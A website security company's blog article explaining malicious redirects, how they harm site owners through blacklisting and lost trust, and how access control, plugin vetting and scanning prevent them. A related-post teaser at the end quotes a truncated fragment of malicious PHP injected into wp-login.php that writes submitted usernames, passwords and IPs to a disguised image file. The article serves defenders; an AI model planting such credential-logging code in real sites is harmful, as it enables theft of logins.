Understanding & Stopping Malicious Redirects

Understanding & Stopping Malicious Redirects

Many website owners don’t know they’re infected with malicious redirects until they start getting calls from wary customers. Instead of the site they were expecting, it loaded some pretty shady content from the nether reaches of the internet.

Malicious redirects are caused by hackers injecting scripts into infected sites that send visitors to destinations where they usually get scammed or infected with malware.

Not to be confused with SEO spam, malicious redirects take away — or redirect — visitors from their intended websites. These hacks can be triggered by clicking on a search result or during a visit to the website itself.

Examples of malicious redirects

Scripts that execute malicious redirects can lurk anywhere on a website. We’ve seen them in databases where they recognized real visitors instead of search engine spiders, and then sent traffic to a malware download.

The malicious redirect was triggered from a search engine results page, not within the infected website. One click, and wham — malware starts downloading.

It’s also very common to find malicious redirects infecting third-party scripts for components like themes and plugins. In one instance, it was a fix for the much-beloved Tweet counter on WordPress websites.

In another, a third-party component deliberately redirected mobile visitors to the legit download pages of unwanted apps — an effort to score extra money.

Given the potential consequences of malicious redirects, it’s crucial to carefully evaluate third-party components before installing them and implement the measures we’ll discuss later.

The impacts of malicious redirects

Like any hack, malicious redirects will gain the attention of search engines. An infected site will eventually get blacklisted, which cuts off nearly all traffic from organic searches. Even with the malicious scripts removed, it’s a difficult and often expensive process to convince search engines to unflag a site, allowing its rank to slowly be restored.

And let’s not ignore the immediate impact. What’s going to happen when a visitor goes to a website to buy shoes, but instead gets swept into a scam? Chances are, that’ll be their last visit.

The combined effect of blacklisting and damaged reputation can easily overwhelm a business. Imagine trying to find the source of an infection while dealing with furious customers and lost revenue, and then facing search engine blacklists and the cost of fixing the hack.

How to stop malicious redirects

Fortunately, malicious redirects can be stopped. It requires controlling who has access to your site, staying familiar with all its components, and maintaining awareness of your site’s health. Here’s how that breaks down:

  • Access — Make sure people have only the least amount of access necessary to let them work on your site. Remove any unused accounts. This reduces the amount of ingresses a hacker will have. Also consider putting your website behind a firewall, which blocks malicious traffic before it reaches your site.
  • Components — Don’t install third-party components (e.g. plugins and themes) without checking out their developer or only install from the official CMS repositories. Make sure you know how often they’re updated and who’s handling those updates. And periodically audit your third-party components to see if any are unused or outdated and need to be removed.
  • Awareness — Make sure there’s a way to regularly scan your website for signs of infection or vulnerability. This can be as simple as using one of the many free remote scanners, like SiteCheck or UnmaskParasites. You should also have an application for server-side scans, which look deeper into a site’s files and databases.

These are by no means everything necessary to maintain website security, but rather what’s mandatory to protect yourself against injections. It’s far better to develop a complete plan for website security, which addresses all types of threats.

How to remove malicious redirects

If you’re already hacked, it’s critical to get help now. We’ve already discussed the consequences, so it’s critical to take immediate steps toward recovery. If you’re technically savvy, it’s likely you can clean the hack by yourself — and we offer many free resources to help you get this done.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post